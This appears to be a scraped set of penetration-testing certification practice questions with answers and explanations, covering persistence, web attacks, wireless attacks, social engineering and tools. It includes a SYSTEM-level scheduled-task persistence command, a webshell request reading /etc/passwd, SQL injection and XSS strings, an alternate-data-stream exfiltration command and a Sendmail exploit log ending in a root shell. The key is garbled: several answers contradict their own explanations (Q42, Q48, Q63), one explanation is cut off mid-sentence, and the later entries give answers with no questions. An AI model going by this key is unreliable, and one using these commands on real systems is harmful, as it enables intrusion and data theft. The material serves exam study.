A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

Explanation:
OBJ-3.7: A scheduled task or scheduled job is an instance of execution, like initiating a process or running of a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM” that will create a task called “beacon” that runs the script at “C:\temp\beacon.bat every 20 minutes as the SYSTEM level user. The other variant of schtasks is incorrect because it used a Linux-based file directory structure to reference the script location and would fail to run in Windows. The crontab options are used in Linux, not in Windows.

Question 41

Q

Which attack utilizes a wireless access point made to look as if it belongs to the network to eavesdrop on the wireless traffic?

A.Evil Twin
B.Rogue Access Point
C.WEP Attack
D.Wardriving

Answer

A

A.Evil Twin

Explanation:
OBJ-3.3: An evil twin is meant to mimic a legitimate hotspot provided by a nearby business, such as a coffee shop that provides free Wi-Fi access to its patrons. The evil twin is the wireless LAN equivalent of the phishing scam. This type of attack may be used to steal the passwords of unsuspecting users by monitoring their connections or phishing, which involves setting up a fraudulent web site and luring people there.

Question 42

Q

You are conducting a penetration test against an organization. You created an evil twin of their wireless network. Many of the organization’s laptops are now connected to your evil twin access point. You want to capture all of the victim’s web browsing traffic in an unencrypted format during your attack. Which of the following exploits should you utilize to meet this goal?

A>Perform a deauthentication attack
B.Perform an SSL downgrade attack
C.Perform a man-in-the-middle attack
D.Perform an SSL stripping attack

Answer

A

D.Perform an SSL stripping attack

Explanation:
OBJ-3.3: An SSL stripping attack, also known as an HTTP downgrade attack, forces the client to communicate with the webserver in plain text (unencrypted) over HTTP instead of HTTPS. Both SSL downgrade and SSL stripping attacks are used to force the victim into using a weaker encryption mechanism (SSL downgrade to SSL-based HTTPS) or no encryption (SSL stripping to HTTP) for its web traffic.

Question 43

Q

A penetration tester is conducting an assessment of a wireless network that is secure using WPA2 Enterprise encryption. Which of the following are major differences between conducting reconnaissance of a wireless network versus a wired network? (SELECT TWO)

A.Encryption
B.Network access Control
C.Port security
D.Authentication
E.Physical accessibility
F.MAC filtering

Answer

A

A.Encryption
E.Physical accessibility

Explanation:
OBJ-3.3: Most wireless networks utilize end-to-end encryption, whereas wired networks do not. Physical accessibility is another major difference between wireless and wired networks since wireless networks can be accessed from a distance using powerful antennas. Authentication, MAC filtering, and network access control (NAC) can be implemented equally on wired and wireless networks. Port security is only applicable to wired networks.

Question 44

Q

Fail to Pass Systems recently installed a break and inspect appliance that allows their cybersecurity analysts to observe HTTPS traffic entering and leaving their network. Consider the following output from a recorded session captured by the appliance:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
POST /www/default.php HTTP/1.1
HOST: .123
Content-Length: 147
Cache-Control: no-cache
Origin: chrome-extension://ghwjhwrequsds
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0
Content-Type: multipart/form-data; boundary=—-
WebKitFormBoundaryaym16ehT29q60rUx
Accept:/
Accept-Language: zh, en-us; q=0.8, en; q=0.6
Cookie: security=low; PHPSESSID=jk3j2kdso8x73kdjhehakske

——WebKitFormBoundaryaym16ehT29q60rUx
Content-Disposition: form-data; name=”q”

cat /etc/passwd

—–WebKitFormBoundaryaym16ehT29q60rUx
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following statements is true?

A.The /etc/passwd file was just downloaded through a webshell by an attacker
B.This is a normal request from a host to your web server in the DMZ
C.A request to issue the command “cat /etc/passwd” occurred but additional analysis is required to verify if the file was downloaded
D.The web browser used in the attack was Microsoft Edge

Answer

A

C.A request to issue the command “cat /etc/passwd” occurred but additional analysis is required to verify if the file was downloaded

Explanation:
OBJ-3.2: This is a post request to run the “cat /etc/passwd” command from an outside source. It is not known from the evidence provided if this command were successful or not, but it should be analyzed further as this is not what would be expected, normal traffic. While the browser’s default language was configured for Chinese (zh), this is easily changed and cannot be used to draw authoritative conclusions about the threat actor’s true location or persona. The User-Agent used is listed as Mozilla, which is used by both Firefox and Google Chrome. For an in-depth analysis of the full attack this code snippet was taken from, please visit https://www.rsa.com/content/dam/en/solution-brief/asoc-threat-solution-series-webshells.pdf. This 6-page article is definitely worth your time to look over and learn how a remote access web shell is used as an exploit.

Question 45

Q

You are conducting a static analysis of an application’s source code and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
String query = “SELECT * FROM courses WHERE courseID=’” + request.getParameter(“id”) + “’ AND certification=’”+ request.getParameter(“certification”)+”’”;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

If an attacker wanted to get a complete copy of the courses table and was able to substitute arbitrary strings for “id” and “certification”, which of the following strings allow this to occur?

A. id = “1’ OR ‘1’==’1” and certification = “cysa’ OR ‘1’==’1”
B.id = “1’ OR ‘1==1” and certification = “cysa’ OR ‘1==’1”
C.id = “1’ OR ‘1’==’1”
D.certification = “cysa’ OR ‘1”==’1”

Answer

A

A. id = “1’ OR ‘1’==’1” and certification = “cysa’ OR ‘1’==’1”

Explanation:
OBJ-3.4: ID and certification must be crafted so that when substituted for the “.getparameter” fields, the SQL statement formed is still complete and will return a Boolean value of true for the ENTIRE statement every time it is evaluated. The AND in the middle of the WHERE clause indicates that both the courseID and certification portion must be true to be true in every case. When this occurs, the entire table of courses would be returned. The only string that would ensure both halves of the WHERE clause always return true would be

Question 46

Q

While conducting a penetration test of an organization’s web applications, you attempt to insert the following script into the search form on the company’s web site:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
alert(“This site is vulnerable to an attack!”)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Then, you clicked the search button, and a pop-up box appears on your screen showing the following text, “This site is vulnerable to an attack!” Based on this response, what vulnerability have you uncovered in the web application?

A.Buffer Overflow
B.Cross-site request forgery
C.Distributed denial of service
D.Cross-site scripting

Answer

A

D.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

Question 47

Q

Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed a large increase in the number of compromised user accounts on the system.

What type of attack is most likely the cause of both of these events?

A.SQL Injection
B.Cross-site scripting
C.Cross-site request forgery
D.Rootkit

Answer

A

B.Cross-site scripting

Explanation:
OBJ-3.4: This scenario is a perfect example of the effects of a cross-site scripting (XSS) attack. If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. An XSS will allow an attacker to execute arbitrary JavaScript within the victim’s browser (such as creating pop-ups). A CSRF would allow an attack to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected. SQL injection is the placement of malicious code in SQL statements via web page input. None of the things described in this scenario would indicate a CSRF, rootkit, or SQL injection.

Question 48

Q

Christina is conducting a penetration test against Dion Training’s network. The goal of this engagement is to conduct data exfiltration of the company’s exam database without detection. Christina enters the following command into the terminal:

-=-=-=-=-=-=-
C:\database\exams.db>c:\Users\Christina\Desktop\beachpic.png:exams.db
-=-=-=-=-=-=-

Next, Christina emailed the beachpic.png file to her personal email account. Which of the following techniques did she use to exfiltrate the file?

A.NTFS Encryption
B.Alternate data streams
C.Unquoted service path
D.DLL Hijacking

Answer

A

C.Unquoted service path

Explanation:
OBJ-3.7: An alternate data stream (ADS) is a feature of Microsoft’s NT File System (NTFS) that enables multiple data streams for a single file name by forking one or more files to another. ADS can be abused by hiding one file into another, as shown in this scenario. Once received in her email, she could access the database by opening the file as “beachpic.png:exams.db”.

Question 49

Q

You are attempting to exploit a network-based vulnerability against a RedHat Linux server. You execute the following commands and receive the results below:

-=-=-=-=-=-
[pentest@DionTraining]# ./bysin support DionTraining RedHat
Sendmail <8.12.8 crackaddr() exploit by bysin
     from the l33tsecurity crew
Resolving address... Address found
Connecting... Connected!
Sending exploit... Exploit sent!
Waiting for root prompt…

[pentest@DionTraining]# telnet localhost 2525
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
whoami
root
-=-=-=-=-=-

Based on the output above, which of the following exploits are you preparing to use?

A.SNMP Exploit
B.FTP Exploit
C.SMB Exploit
D.SMTP Exploit

Answer

A

D.SMTP Exploit

Explanation:
OBJ-3.2: If you see a question like this, don’t let it confuse you. Look for keywords and phrases that you recognize to answer the question. As you look at the command issued in the first line, you may not recognize it. That is because this is an older exploit script that is being run with the parameters of support (the user account we are trying to exploit), DionTraining (our penetration testing machine’s name), and RedHat (our target/victim server). Ignoring this line, look at the second line where you see a keyword that you should recognize: Sendmail. Sendmail is a service that runs on Linux machines to “send mail” using the SMTP protocol over port 25. This is the key to answering this question. As you continue through the script, you see it performed a DNS name resolution from RedHat to the server’s IP, connected to the server, and successfully sent the exploit. This exploit conducts a buffer overflow against a vulnerable Sendmail server resulting in the server providing a remote callback to a listening port on the attacker’s machine (port 2525). This is why the attacker then telnets into their localhost over port 2525 and runs the whoami command to determine what user they are connected to the victimized server as. In this case, they are reported as the root user, which means this SMTP exploit was successful.:

Question 50

Q

During a penetration test, which of the following should you perform if your goal is to conduct a successful vishing attack?

A.Send a text message with a malicious link to the organizations executives
B.Send targeted emails with a malicious link attachment to the organizations CEO
D.Call the CTOs assistant using a pretext tot gather information about their schedule

Answer

A

D.Call the CTOs assistant using a pretext tot gather information about their schedule

Explanation:
OBJ-3.1: Vishing (voice phishing) is a phishing attack in which an attacker entices their victim through a traditional telephone system or IP-based voice communications like Voice over IP (VoIP). If the attack is being carried out using the attacker’s voice over a telephone, it is usually considered vishing.

Question 51

Q

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output:

=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
10. 1.1.1 - - [10/Jan/2020:13:23:51 +0000] “POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT “

10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] “GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1” 200 941 “-“ “USERAGENT”

1.1.1 - - [10/Jan/2020:16:12:31 +0000] “POST /vpns/portal/scripts/newbm.pl HTTP/1.1” 200 143 “https://10.1.1.2/” “USERAGENT”
- =-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A.SQL injection
B.Directory traversal
C.XML Injection
D.Password spraying

Answer

A

B.Directory traversal

OBJ-3.4: A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various user’s passwords by attempting a compromised password against multiple user accounts.

Question 52

Q

You are conducting a social engineering attack against an organization as part of an engagement. You walk into the break room and see a couple of system administrators talking about the previous weekend’s football game. You listen for a moment as the two argue over whose team was better. You notice that one of the guys is about your age and talks really fast. You walk over and immediately start talking fast, backing up this guy’s claims about his team, and joking around with him. After they are done talking about football, you comment about how Linux servers are so much better than Windows to see his response as you try to figure out the server types used at this organization. What type of social engineering principle is being exploited here?

A.Authority
B.Scarcity
C.Intimidation
D.Likeness

Answer

A

D.Likeness

Explanation:
OBJ-3.1: Likeness is the social engineering motivational technique that relies on people being more willing to help people who look and sounds like themselves. In this scenario, the social engineer started talking sports and acting like the victim he sought to exploit. He then started making jokes about different server types to see if he could gain some information from the victim.

Question 53

Q

A cybersecurity analyst notices that an attacker is trying to crack the WPS pin associated with a wireless printer. The device logs show that the attacker tried 00000000, 00000001, 00000002 and continued to increment by 1 number each time until they found the correct PIN of 13252342. Which of the following type of password cracking was being performed by the attacker?

A.Rainbow table
B.Dictionary
C.Hybrid
D.Brute-force

Answer

A

D.Brute-force

Explanation:
OBJ-3.4: Brute-force attack when an attacker uses a set of predefined values to attack a target and analyze the response until he succeeds. Success depends on the set of predefined values. It will take more time if it is larger, but there is a better probability of success. In a traditional brute-force attack, the passcode or password is incrementally increased by one letter/number each time until the right passcode/password is found.

Question 54

Q

You are conducting a wireless penetration test against an organization. You have been monitoring the WPA2 encrypted network for almost an hour but have been unable to successfully capture a handshake. Which of the following exploits should you use to increase your chances of capturing a handshake?

A.Fragmentation Attack
B.Deauthentication Attack
C.Karma Attack
D.Downgrade attack

Answer

A

B.Deauthentication Attack

Explanation:
OBJ-3.3: Deauthentication attacks are used in the service of an evil twin, replay, cracking, denial of service, and other attacks. All 802.11 Wi-Fi protocols include a management frame that a client can use to announce that it wishes to terminate a connection with an access point. The victim’s device will be kicked off the access point by spoofing the victim’s MAC address and sending the deauthentication frame to the access point. If the user is still using the network, the wireless adapter will automatically reconnect by sending a handshake to the access point. This allows the attacker to capture the handshake during the reconnection.

Question 55

Q

You are conducting a social engineering attack against an organization as part of an engagement. You spoof your caller ID to appears to be from within the company, then you call up the company and ask to speak with the CIO’s assistant. When they answer the phone, you tell them that you are from the IT department and that you detected a malicious intruder has taken over their account and is encrypting data all over the next. You offer to help them stop the attack quickly, but they first need to give you their password. The victim says they won’t give that information to your over the phone, to which you respond, “Ok, fine, but when the boss finds out that you could have stopped this attack and chose to ignore me, don’t say I didn’t warn you.” What type of social engineering principle is being exploited here?

A.Authority
B.Scarcity
C.Fear
D.Trust

Answer

A

C.Fear

Explanation:
OBJ-3.1: Fear is a visceral emotion that can motivate people to act in ways they normally would not. In this scenario, the social engineer tries to convince the victim that their actions must be taken immediately, or bad consequences might occur. This is an attempt to cause fear and anxiety in the victim to hand over their password.

Question 56

Q

How is it possible to determine if an executable file is a shell script read by Bash?

A.The file must end with .sh
B.The first line starts with !#/bin/bash
C./bin/bash has to be run in debug mode
D.Only if you are logged in as root

Answer

A

B.The first line starts with !#/bin/bash

Explanation:
OBJ-4.4: The first line of the script should start with #!/bin/bash. Most shell scripts will end with a .sh by convention, but it is not required. Remember, in Linux, file extensions are only useful to the end-user, but the operating system completely ignores them.

Question 57

Q

Which of the following tools provides a penetration tester with PowerShell scripts that can maintain persistence and cover their tracks?

A.Powersploit
B.Responder
C.Empire
D.Searchsploit

Answer

A

A.Powersploit

Explanation:
OBJ-4.2: Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

Question 58

Q

What popular open-source port scanning tool is commonly used for host discovery and service identification?

A.Nmap
B.dd
C.Services.msc
D.Nessus

Answer

A

A.Nmap

Explanation:
OBJ-4.2: The world’s most popular open-source port scanning utility is nmap. The Services console (services.msc) allows an analyst to disable or enable Windows services. The dd tool is used to copy files, disk, and partitions, and it can also be used to create forensic disk images. Nessus is a proprietary vulnerability scanner developed by Tenable. While Nessus does contain the ability to conduct a port scan, its primary role is as a vulnerability scanner, and it is not an open-source tool.

Question 59

Q

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them to cause an error or failure condition. Which of the following is the laboratory performing?

A.Fuzzing
B.Stress Testing
C.User Acceptance Testing
D.Security Regression Testing

Answer

A

A.Fuzzing

Explanation:
OBJ-4.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security, are therefore of high significance, and the interest in such approaches has steadily increased. Stress testing verifies the system’s stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

Question 60

Q

Which of the following tools is a post-exploitation framework that would allow a penetration tester to run PowerShell agents without requiring the use of powershell.exe?

A.Powersploit
B.Responder
C.Empire
D.Searchsploit

Answer

A

C.Empire

Explanation:
OBJ-4.2: Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

Question 61

Q

Which of the following tools is considered a web application scanner?

A.Nessus
B.Qualys
C.OpenVAS
D.ZAP

Answer

A

D.ZAP

Explanation:
OBJ-4.2: OWASP Zed Attack Proxy (ZAP) is the world’s most widely used web application scanner. It is free, open-source, and provided by the Open Web Application Security Project (OWASP). Nessus, Qualys, and OpenVAS are all classified as infrastructure vulnerability scanners.

Question 62

Q

If you cannot ping a target because you are receiving no response or a response that states the destination is unreachable, then ICMP may be disabled on the remote end. If you wanted to elicit a response from a host using TCP, what tool would you use?

A.Hping
B.Traceroute
C.Ptunnel
D.Broadcast ping

Answer

A

A.Hping

Explanation:
OBJ-4.2: Hping is a handy little utility that assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command but offered far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. Hping is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. Hping also allows you to map out firewall rule sets. It is also great for learning more about TCP/IP and experimenting with IP protocols. Hping does not support IPv6, though, so the NMAP creators have created Nping to fill this gap and serve as an updated variant of Hping. Traceroute and tracert are computer network diagnostic commands for displaying the route and measuring packets’ transit delays across an Internet Protocol network. Traceroute uses ICMP and not TCP. Broadcast ping is simply pinging the subnet’s broadcast IP using the ping command, but if a regular ping does not work, neither will a broadcast ping. Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies. Ptunnel is used as a covert channel, not to elicit a response from a host using TCP.

Question 63

Q

A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output:

-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-
[443] [https-get-form] host: diontraining.com login: jason password: password
[443] [https-get-form] host: diontraining.com login: jason password: CompTIACySA+
[443] [https-get-form] host: diontraining.com login: jason password: 123456
[443] [https-get-form] host: diontraining.com login: jason password: qwerty
[443] [https-get-form] host: diontraining.com login: jason password: abc123
[443] [https-get-form] host: diontraining.com login: jason password: password1
[443] [https-get-form] host: diontraining.com login: jason password: P@$$w0rd!
[443] [https-get-form] host: diontraining.com login: jason password: C0mpT1@P@$$w0rd
-=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=–=-=-=-=-

What type of attack was most likely being attempted by the attacker?

A.Password spraying
B.Impersonation
C.Credential stuffing
D.Brute force

Answer

A

D.Brute force

Explanation:
OBJ-4.3: This is an example of a brute force attack. Unlike password spraying that focuses on attempting only one or two passwords per user, a brute force attack focuses on trying multiple passwords for a single user. The goal of this attack is to crack the user’s password and gain access to their account. Password spraying, instead, refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using several different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraudulent purposes. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack for their own purposes.

Question 64

Q

What tool can be used as an exploitation framework during your penetration tests?

A.Nmap
B.Metasploit
C.Nessus
D.Autopsy

Answer

A

B.Metasploit

Explanation:
OBJ-4.1: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. Autopsy is used in digital forensic investigations.

Answer 65

A

C.443

Explanation:
OBJ-4.3: Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).

Answer 66

A

A.BeEF

Explanation:
OBJ-4.2: BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website. Netcat is an open-source networking utility for debugging and investigating the network, and that can be used to create TCP/UDP connections and investigate them. Nikto is an open-source web server scanner that searches for potentially harmful files, checks for outdated web server software, and looks for problems with some web server software versions. Androzer is a security testing framework for Android apps and devices.

Answer 67

A

A.Your email server is running on a non standard port

Explanation:
OBJ-4.1: As shown in the nmap scans’ output, only two standard ports being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.

Answer 68

A

B.nmap -p80,443 -oL servers.txt -oX results.txt

Explanation:
OBJ-4.1: The command (nmap -p80,443 -iL servers.txt -oG results.txt) will only perform a nmap scan against ports 80 and 443. The -iL option will scan each of the listed server’s IP addresses. The -oX option will save the results in an XML format to the file results.txt while still displaying the normal results to the shell. The option of -sL will only list the servers to scan, and it will not actually scan them. The option of -oG is for outputting the results to a file in a greppable format.

Answer 69

A

C.set type=ns

Explanation:
OBJ-4.2: The “set type=ns” tells nslookup only reports information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

Answer 70

A

D.Lessons learned report

Explanation:
OBJ-5.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. The chain of custody report is the chronological documentation or paper trail that records the custody, control, transfer, analysis, and disposition of physical or electronic evidence.

Answer 71

A

A.To report indicators of compromise

Explanation:
OBJ-5.4: If an indicator of a previous compromise is found during a penetration test, the team should pause their work and immediately inform the client’s trusted point of contact. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

Answer 72

A

C.gpupdate

Explanation:
OBJ-5.3: The gpupdate command refreshes a computer’s local Group Policy, as well as any Active Directory-based group policies. This command works on Windows 10, 8, 7, Vista, and XP. The gpupdate command can be used to restrict access to USB removable storage devices (like USB thumb drives and hard drives). In some organizations, USB storage devices are blocked for security reasons to prevent security leakage of confidential data and the penetration of viruses into the internal corporate network.

Answer 73

A

A.Application whitelist

Explanation:
OBJ-5.3: Application whitelisting will only allow a program to execute if it is specifically listed in the approved exception list. All other programs are blocked from running. This makes it the BEST mitigation against a zero-day virus. An intrusion detection system might detect the anomalous activity created by a piece of malware, but it will only log or alert based on the activity, not prevent it. A host-based firewall may prevent a piece of malware from establishing a network connection with a remote server. Still, again, it wouldn’t prevent infection or prevent it from executing. An anti-malware solution is a good investment towards improving your security. Since the threat is a zero-day virus, an anti-malware solution will not detect it using its signature database.

Answer 74

A

A.Layer 7 Firewall

Explanation:
OBJ-5.3: Layer 7 firewalls are application-filtering firewalls. FTP traffic does not usually travel over port 25 and should travel over port 21. Using a Layer 7 firewall, the device can perform a deep packet inspection (DPI) to identify which application or protocol is actually being used to send traffic over a given port.

Answer 75

A

A.Indicator of compromise

Explanation:
OBJ-5.4: An indicator of compromise is an artifact observed on a network or in an operating system that, with high confidence, indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs, or botnet command and control servers’ domain names. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A botnet consists of many Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allows the attacker to access the device and its connection.

Answer 76

A

D.Management Network

Explanation:
OBJ-5.3: The management interface should only be exposed to an isolated or dedicated network used for the management and configuration of the network device and platforms only. This would also help reduce the likelihood of an attack against the virtualization platform or the hypervisor itself. The external zone (internet), internal zone (LAN), or DMZ should not have the management interface exposed to them.

Answer 77

A

A.Full packet capture

Explanation:
OBJ-5.3: Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent. A net flow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent. Still, it will not reveal anything about the content itself since it only analyzes the metadata for each packet crossing the network. A SIEM event log being monitored might detect that an authentication event has occurred. Still, it will not necessarily reveal if the password was sent in cleartext, as a hash value, or in the ciphertext. A software design documentation may also reveal the designer’s intentions for authentication when they created the application, but this only provides an ‘as designed’ approach for a given software and does not provide whether the ‘as-built’ configuration was implemented securely.

Answer 78

A

D.Downgrade the server and defer the new feature testing

Explanation:
OBJ-5.3: Since the vendor stated that the new version introduces vulnerabilities in the environment, it is better to downgrade the server to the older and more secure version until a patch is available.

Answer 79

A

B.To report critical findings

Explanation:
OBJ-5.4: If an indicator of a previous compromise is found during a penetration test, the team should immediately inform the client’s trusted point of contact unless the scope of work states otherwise. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

Answer 80

A

D.Mitigation

Explanation:
OBJ-5.1: Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

Answer 81

A

D.Detailed list of cost incurred

Explanation:
OBJ-5.1: A detailed list of costs incurred is not required as part of the final report but instead would be included as part of your invoicing. Your report should contain an executive summary, your methodology used in the assessment, and your findings and prioritized recommendations.

Answer 82

A

A.Risk appetite

Explanation:
OBJ-5.1: Risk appetite describes how much risk an organization is willing to accept. This is a crucial factor both in designing the assessment and determining the recommended mitigations. Risk mitigation is a strategy to prepare for and lessen the effects of threats faced by a data center. Risk mitigation refers to applying security controls to reduce the risk of a known vulnerability. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. Risk acceptance is the act of accepting the identified risk and not taking additional actions to reduce the risk because the risk is low enough. Risk acceptance should only be done once an organization’s risk tolerance is defined and communicated amongst the decision-makers.

Answer 83

A

C.To report that a production server is unresponsive

Explanation:
OBJ-5.4: If a server becomes unresponsive during a penetration test, the team should pause their work and immediately inform the client’s trusted point of contact. The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contract their trusted point of contact within the organization to get further guidance. The trusted agents and communication paths should be determined when planning the engagement.

Answer 84

A

B.Patching

Explanation:
OBJ-5.3: While patching is a great way to combat threats and protect your systems, it is not effective against zero-day threats. By definition, a zero-day threat is a flaw in the software, hardware, or firmware that is unknown to the party or parties responsible for patching or otherwise fixing the flaw. This attack has no time (or days) between the time the vulnerability is discovered and the first attack, and therefore no patch would be available to combat it. Using segmentation, whitelisting, and threat intelligence, a cybersecurity analyst, can put additional mitigations in place to protect the network even if a zero-day attack was successful.

Answer 85

A

C.To remove persistence on the server

Explanation:
